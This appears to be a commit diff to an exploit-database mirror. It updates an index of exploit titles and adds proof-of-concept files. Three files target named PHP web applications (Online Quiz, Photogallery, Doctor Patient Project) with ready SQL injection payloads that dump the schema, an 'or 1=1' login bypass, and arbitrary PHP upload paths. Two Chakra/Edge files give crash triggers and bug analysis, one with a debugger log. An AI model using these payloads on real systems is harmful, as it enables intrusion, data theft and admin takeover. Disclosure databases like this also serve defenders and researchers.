6180,platforms/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' Parameter SQL Injection",2008-08-01,CraCkEr,php,webapps,0
@ -29174,9 +29192,9 @@ id,file,description,date,author,platform,type,port
26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0
26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0
26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0
26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - reply.pl Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - stats.pl Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - toc.pl board Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl' 'board' Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - forum.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 - profile.cgi user Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - post.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0
@ -35344,7 +35362,7 @@ id,file,description,date,author,platform,type,port
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
36490,platforms/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI redirection",2012-01-04,"Mesut Timur",php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0
36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0
36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0
@ -36018,7 +36036,7 @@ id,file,description,date,author,platform,type,port
37484,platforms/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0
37485,platforms/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0
37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0
37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0
37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0
37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0
37563,platforms/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0
37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,ios,webapps,0
@ -38259,3 +38277,6 @@ id,file,description,date,author,platform,type,port
42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0
42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0
42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
42462,platforms/php/webapps/42462.txt,"Photogallery Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
42463,platforms/php/webapps/42463.txt,"Doctor Patient Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

3
platforms/multiple/remote/1791.patch
View file

@ -15,6 +15,5 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
os->flush();
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
E-DB Note:
Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)

56
platforms/php/webapps/42461.txt Executable file
View file

@ -0,0 +1,56 @@
# # # # #
# Exploit Title: Online Quiz Project 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 17.08.2017
# Vendor Homepage : http://surajkumar.in/
# Software Link: http://surajkumar.in/product/online-quiz-project-php/
# Demo: http://surajkumar.in/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands...
# The vulnerability allows an attacker to access the user panel...
#
# Vulnerable Source:
# # # # #
# <?php
# ....1
# if(isset($_POST['_login'])){
# $data=array();
# $data['user']=$_POST['_user'];
# $data['password']=$_POST['_password'];
# $userLogin=user_login($data);
# _t($userLogin);
# if($userLogin['bool']==fa
#
# ....2
# $questionData='';
# if(isset($_GET['cat_id'])){
# $userData=get_result_by_user($_SESSION['user']['user_id'],$_GET['cat_id']);
# ....
# }else{
# $query=mysqli_query($db,"SELECT * FROM user_answered WHERE user_id='$user_id' AND cat_id='$cat_id'");
# }
# ....
# ?>
# # # # #
#
# Proof of Concept:
#
# 1:
# http://localhost/[PATH]/result.php?cat_id=[SQL]
# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-&docname=0x30783330
#
# 2:
# http://localhost/[PATH]/login.php
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# Etc...
# # # # #

78
platforms/php/webapps/42462.txt Executable file
View file

@ -0,0 +1,78 @@
# # # # #
# Exploit Title: Photogallery Project 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 17.08.2017
# Vendor Homepage : http://surajkumar.in/
# Software Link: http://surajkumar.in/product/photogallery-project-in-php/
# Demo: http://surajkumar.in/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands...
# The vulnerability allows an attacker to access the normal member and administration panel...
# The vulnerability allows an ordinary member upload arbitrary file...
#
# Vulnerable Source:
# # # # #
# <?php
# ....1
# $pageContent=get_pages($_GET['page_id']);
# ..
# function get_pages($pageid){
# $res=array();
# global $connection;
# if($pageid==0){
# $fetchPages=mysqli_query($connection,"SELECT * FROM ".PAGE);
# }else{
# $fetchPages=mysqli_query($connection,"SELECT * FROM ".PAGE." WHERE id='$pageid'");
#
# ....2
# $userData=get_user_by_id($_SESSION['userID']);
# if(isset($_POST['user_image'])){
# $userImage=$_FILES['userImg']['name'];
# $userTmpImage=$_FILES['userImg']['tmp_name'];
# if(!file_exists('profile_pics'.'/'.$userImage)){
# $img=$userImage;
# }else{
# $rand=rand(1,1000);
# $img=$rand.'_'.$userImage;
# }
# if(move_uploaded_file($userTmpImage,'profile_pics'.'/'.$img)){
# $updateImg=update_profile_img($img,$userData['userData']['id']);
# if($updateImg['bool']==true){
#
# ....3
# if(isset($_POST['_login'])){
# $data=array();
# $data['email']=$_POST['_email'];
# $data['password']=$_POST['_pass'];
# $loginRes=user_login($data);
# if($loginRes['bool']==true){
# ....
# ?>
# # # # #
#
# Proof of Concept:
#
# 1:
# http://localhost/[PATH]/page.php?page_id=[SQL]
# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/++0x283129,0x283229,0x283329,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529)+--+-&title=<h1>%49%68%73%61%6e%20%53%65%6e%63%61%6e</h1>
#
# 2:
# http://localhost/[PATH]/edit_profile_img.php?profile_id=[ID]
# http://localhost/[PATH]/profile_pics/[FILE].php
#
# 3:
# http://localhost/[PATH]/login.php
# http://localhost/[PATH]/admin
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# Etc...
# # # # #

71
platforms/php/webapps/42463.txt Executable file
View file

@ -0,0 +1,71 @@
# # # # #
# Exploit Title: Doctor Patient Project 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 17.08.2017
# Vendor Homepage : http://surajkumar.in/
# Software Link: http://surajkumar.in/product/doctor-patient-project-php/
# Demo: http://surajkumar.in/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands...
# The vulnerability allows an attacker to access the administration panel...
# The vulnerability allows an paitent and doctors users upload arbitrary file...
#
# Vulnerable Source:
# # # # #
# <?php
# ....1
# if(isset($_GET['docID']) && isset($_GET['docname'])){
# $docID=$_GET['docID'];
# $docname=$_GET['docname'];
# $docData=docData($docID);
# ...
# function docData($docID){
# $res=array();
# $query=mysql_query("SELECT * FROM ".USERS.",".DOC." WHERE ".DOC.".doc_id='$docID' AND ".USERS.".id=".DOC.".doc_id");
# if(mysql_num_rows($query)>0){
#
# ....2
# $data['_filename']=$_FILES['_docImage']['name'];
# $data['_filetmp']=$_FILES['_docImage']['tmp_name'];
# $data['_folder']='doc_images';
#
# ....3
# if(isset($_POST['signin'])){
# $data=array();
# $data['user']=$_POST['user'];
# $data['pass']=$_POST['pass'];
# $res=adminLogin($data);
# if($res['bool']==true){
# ....
# ?>
# # # # #
#
# Proof of Concept:
#
# 1:
# http://localhost/[PATH]/single.php?docID=[SQL]
# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-&docname=0x30783330
#
# 2/1:
# http://localhost/[PATH]/patient/profile.php
# http://localhost/[PATH]/patient/pat_images/[FILE].php
#
# 2/2:
# http://localhost/[PATH]/doctor/profile.php
# http://localhost/[PATH]/doctor/doc_images/[FILE].php
#
# 3:
# http://localhost/[PATH]/admin
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# Etc...
# # # # #

76
platforms/windows/dos/42464.html Executable file
View file

@ -0,0 +1,76 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1266
function trigger() {
try {
} catch (x) {
var x = 1;
}
print(x);
}
trigger();
When Chakra executes the above code, it declares two "x"s. One is only for the catch scope, the other is for the whole function scope. The one for the whole function scope is initialized with undefined at the start of the function. If the bytecode generator incorrectly chooses the "x" to initialize, the "x" for the function scope may remain uninitialized. This choice is made in the following code in "ByteCodeGenerator::DefineUserVars".
void ByteCodeGenerator::DefineUserVars(FuncInfo *funcInfo)
{
...
for (pnode = funcInfo->root->sxFnc.pnodeVars; pnode; pnode = pnode->sxVar.pnodeNext)
{
Symbol* sym = pnode->sxVar.sym;
if (sym != nullptr && !(pnode->sxVar.isBlockScopeFncDeclVar && sym->GetIsBlockVar()))
{
if (sym->GetIsCatch() || (pnode->nop == knopVarDecl && sym->GetIsBlockVar()))
{
...
sym = funcInfo->bodyScope->FindLocalSymbol(sym->GetName()); <<< This returns the symbol for the function scope.
...
}
}
// Emit bytecode which initalizes "sym"
}
...
}
However, there's a buggy case that "sym->GetIsCatch()" returns false when it must return true.
Here's a snippet of "PreVisitCatch". This function is supposed to call "SetIsCatch" for all the symbols in the exception parameter. But it doesn't call "SetIsCatch" when the condition "pnode->sxCatch.pnodeParam->nop == knopParamPattern" is satisfied. The PoC reproduces that case, the "x" for the function scope will refer to an uninitialized value in the stack.
void PreVisitCatch(ParseNode *pnode, ByteCodeGenerator *byteCodeGenerator)
{
// Push the catch scope and add the catch expression to it.
byteCodeGenerator->StartBindCatch(pnode);
if (pnode->sxCatch.pnodeParam->nop == knopParamPattern)
{
Parser::MapBindIdentifier(pnode->sxCatch.pnodeParam->sxParamPattern.pnode1, [&](ParseNodePtr item)
{
Symbol *sym = item->sxVar.sym;
});
}
else
{
Symbol *sym = *pnode->sxCatch.pnodeParam->sxPid.symRef;
sym->SetIsCatch(true);
pnode->sxCatch.pnodeParam->sxPid.sym = sym;
}
...
}
PoC:
-->
function trigger() {
try {
} catch ({x}) {
var x = 1;
}
print(x);
}
trigger();

378
platforms/windows/dos/42465.html Executable file
View file

@ -0,0 +1,378 @@
<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
There is a classic heap overflow when eval a string which large enough in Chakra!
This issue can be reproduced steadly in uptodate Edge in Win10 WIP.
An exception will occur immediatly when opening POC.html in Edge.
//ChakraCore-master\lib\Runtime\Library\GlobalObject.cpp
ScriptFunction* GlobalObject::DefaultEvalHelper(ScriptContext* scriptContext, const char16 *source, int sourceLength, ModuleID moduleID, uint32 grfscr, LPCOLESTR pszTitle, BOOL registerDocument, BOOL isIndirect, BOOL strictMode)
{
Assert(sourceLength >= 0);
AnalysisAssert(scriptContext);
if (scriptContext->GetThreadContext()->EvalDisabled())
{
throw Js::EvalDisabledException();
}
#ifdef PROFILE_EXEC
scriptContext->ProfileBegin(Js::EvalCompilePhase);
#endif
void * frameAddr = nullptr;
GET_CURRENT_FRAME_ID(frameAddr);
HRESULT hr = S_OK;
HRESULT hrParser = S_OK;
HRESULT hrCodeGen = S_OK;
CompileScriptException se;
Js::ParseableFunctionInfo * funcBody = NULL;
BEGIN_LEAVE_SCRIPT_INTERNAL(scriptContext);
BEGIN_TRANSLATE_EXCEPTION_TO_HRESULT
{
uint cchSource = sourceLength;
size_t cbUtf8Buffer = (cchSource + 1) * 3; //OVERFLOW when cchSource large enough!!!
ArenaAllocator tempArena(_u("EvalHelperArena"), scriptContext->GetThreadContext()->GetPageAllocator(), Js::Throw::OutOfMemory);
LPUTF8 utf8Source = AnewArray(&tempArena, utf8char_t, cbUtf8Buffer); //Allocate memory on Arena heap with a incorrect but smaller size
Assert(cchSource < MAXLONG);
size_t cbSource = utf8::EncodeIntoAndNullTerminate(utf8Source, source, static_cast< charcount_t >(cchSource)); //OOB write HERE!!!
Assert(cbSource + 1 <= cbUtf8Buffer);
SRCINFO const * pSrcInfo = scriptContext->GetModuleSrcInfo(moduleID);
[...]
LEAVE_PINNED_SCOPE();
}
END_TRANSLATE_EXCEPTION_TO_HRESULT(hr);
END_LEAVE_SCRIPT_INTERNAL(scriptContext);
#ifdef PROFILE_EXEC
scriptContext->ProfileEnd(Js::EvalCompilePhase);
#endif
THROW_KNOWN_HRESULT_EXCEPTIONS(hr, scriptContext);
if (!SUCCEEDED(hrParser))
{
JavascriptError::ThrowParserError(scriptContext, hrParser, &se);
}
else if (!SUCCEEDED(hrCodeGen))
{
[...]
}
else
{
[...]
ScriptFunction* pfuncScript = funcBody->IsCoroutine() ?
scriptContext->GetLibrary()->CreateGeneratorVirtualScriptFunction(funcBody) :
scriptContext->GetLibrary()->CreateScriptFunction(funcBody);
return pfuncScript;
}
}
//ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp
__range(0, cch * 3)
size_t EncodeIntoAndNullTerminate(__out_ecount(cch * 3 + 1) utf8char_t *buffer, __in_ecount(cch) const char16 *source, charcount_t cch)
{
size_t result = EncodeInto(buffer, source, cch);
buffer[result] = 0;
return result;
}
//ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp
__range(0, cch * 3)
size_t EncodeInto(__out_ecount(cch * 3) LPUTF8 buffer, __in_ecount(cch) const char16 *source, charcount_t cch)
{
return EncodeIntoImpl<true>(buffer, source, cch);
}
//ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp
template <bool cesu8Encoding>
__range(0, cchIn * 3)
size_t EncodeIntoImpl(__out_ecount(cchIn * 3) LPUTF8 buffer, __in_ecount(cchIn) const char16 *source, charcount_t cchIn)
{
charcount_t cch = cchIn; // SAL analysis gets confused by EncodeTrueUtf8's dest buffer requirement unless we alias cchIn with a local
LPUTF8 dest = buffer;
if (!ShouldFastPath(dest, source)) goto LSlowPath;
LFastPath:
while (cch >= 4)
{
uint32 first = ((const uint32 *)source)[0];
if ( (first & 0xFF80FF80) != 0) goto LSlowPath;
uint32 second = ((const uint32 *)source)[1];
if ( (second & 0xFF80FF80) != 0) goto LSlowPath;
*(uint32 *)dest = (first & 0x0000007F) | ((first & 0x007F0000) >> 8) | ((second & 0x0000007f) << 16) | ((second & 0x007F0000) << 8); //OOB write HERE finally!!!
dest += 4;
source += 4;
cch -= 4;
}
LSlowPath:
if (cesu8Encoding)
{
[...]
}
else
{
[...]
}
return dest - buffer;
}
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`26db0000 00007ff6`26dd5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffc`fc060000 00007ffc`fc23b000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffc`fb9d0000 00007ffc`fba7e000 C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffc`f90a0000 00007ffc`f92e9000 C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffc`f6b90000 00007ffc`f6c0e000 C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffc`fbbb0000 00007ffc`fbea9000 C:\Windows\System32\combase.dll
ModLoad: 00007ffc`f94c0000 00007ffc`f95b6000 C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffc`fba80000 00007ffc`fbba5000 C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffc`f8620000 00007ffc`f868a000 C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffc`fbfc0000 00007ffc`fc05d000 C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffc`ebd60000 00007ffc`ebdc0000 C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffc`fac50000 00007ffc`fad10000 C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffc`f8580000 00007ffc`f861a000 C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffc`f8560000 00007ffc`f8571000 C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffc`dae30000 00007ffc`db1f4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffc`f86f0000 00007ffc`f8de2000 C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffc`f95c0000 00007ffc`f9661000 C:\Windows\System32\advapi32.dll
ModLoad: 00007ffc`faf10000 00007ffc`faf69000 C:\Windows\System32\sechost.dll
ModLoad: 00007ffc`f97b0000 00007ffc`f9801000 C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffc`fb9a0000 00007ffc`fb9c7000 C:\Windows\System32\GDI32.dll
ModLoad: 00007ffc`f8e40000 00007ffc`f8fc8000 C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffc`fadc0000 00007ffc`faf0a000 C:\Windows\System32\USER32.dll
ModLoad: 00007ffc`f8fd0000 00007ffc`f8fee000 C:\Windows\System32\win32u.dll
ModLoad: 00007ffc`fad10000 00007ffc`fadba000 C:\Windows\System32\shcore.dll
ModLoad: 00007ffc`f84d0000 00007ffc`f851c000 C:\Windows\System32\powrprof.dll
ModLoad: 00007ffc`f8520000 00007ffc`f8535000 C:\Windows\System32\profapi.dll
ModLoad: 00007ffc`eff10000 00007ffc`f0196000 C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffc`f8400000 00007ffc`f8429000 C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffc`f3a60000 00007ffc`f3a86000 C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffc`f77d0000 00007ffc`f7801000 C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffc`f7f20000 00007ffc`f7f37000 C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffc`f7b60000 00007ffc`f7c04000 C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffc`faf70000 00007ffc`fafdc000 C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffc`f9710000 00007ffc`f9718000 C:\Windows\System32\NSI.dll
ModLoad: 00007ffc`f9780000 00007ffc`f97ad000 C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffc`f7b20000 00007ffc`f7b57000 C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffc`f6dc0000 00007ffc`f6f30000 C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffc`f83a0000 00007ffc`f83c5000 C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffc`f7600000 00007ffc`f7621000 C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffc`e85e0000 00007ffc`e8654000 C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffc`f4060000 00007ffc`f4082000 C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffc`efdc0000 00007ffc`efddb000 C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffc`fb410000 00007ffc`fb555000 C:\Windows\System32\ole32.dll
ModLoad: 00007ffc`f6cf0000 00007ffc`f6d85000 C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffc`e7140000 00007ffc`e71e1000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffc`dc6c0000 00007ffc`ddd71000 C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffc`f0b20000 00007ffc`f0b5f000 C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffc`f5120000 00007ffc`f5259000 C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffc`dbb80000 00007ffc`dc36b000 C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffc`f5640000 00007ffc`f56b6000 C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffc`f55a0000 00007ffc`f562f000 C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffc`f41e0000 00007ffc`f4376000 C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffc`e6230000 00007ffc`e62fb000 C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffc`eb8e0000 00007ffc`eb9e6000 C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffc`eb570000 00007ffc`eb5f2000 C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffc`f65d0000 00007ffc`f66b3000 C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffc`eb600000 00007ffc`eb8d2000 C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffc`f1ec0000 00007ffc`f1ed5000 C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffc`ee290000 00007ffc`ee7c1000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffc`f9810000 00007ffc`fac47000 C:\Windows\System32\shell32.dll
ModLoad: 00007ffc`f8df0000 00007ffc`f8e39000 C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffc`ec070000 00007ffc`ec09a000 C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffc`e8d00000 00007ffc`e902e000 C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffc`f83d0000 00007ffc`f8400000 C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffc`fb020000 00007ffc`fb186000 C:\Windows\System32\msctf.dll
ModLoad: 00007ffc`eea60000 00007ffc`eeb62000 C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffc`e4cf0000 00007ffc`e4d00000 C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffc`ebcc0000 00007ffc`ebd29000 C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffc`e9920000 00007ffc`e993b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffc`f28b0000 00007ffc`f2987000 C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffc`f7d80000 00007ffc`f7ddc000 C:\Windows\system32\mswsock.dll
ModLoad: 00007ffc`f3c20000 00007ffc`f3c2b000 C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffc`f01f0000 00007ffc`f03b8000 C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffc`f8390000 00007ffc`f839b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffc`e5180000 00007ffc`e519a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffc`e2c80000 00007ffc`e2e0a000 C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffc`f5820000 00007ffc`f583d000 C:\Windows\System32\rmclient.dll
ModLoad: 00007ffc`e3e70000 00007ffc`e3e88000 C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffc`e24c0000 00007ffc`e2507000 C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffc`f5cf0000 00007ffc`f5fcf000 C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffc`f66c0000 00007ffc`f67e2000 C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffc`f7340000 00007ffc`f73e4000 C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffc`ed850000 00007ffc`ed8d2000 C:\Windows\system32\twinapi.dll
ModLoad: 00007ffc`df920000 00007ffc`df99a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
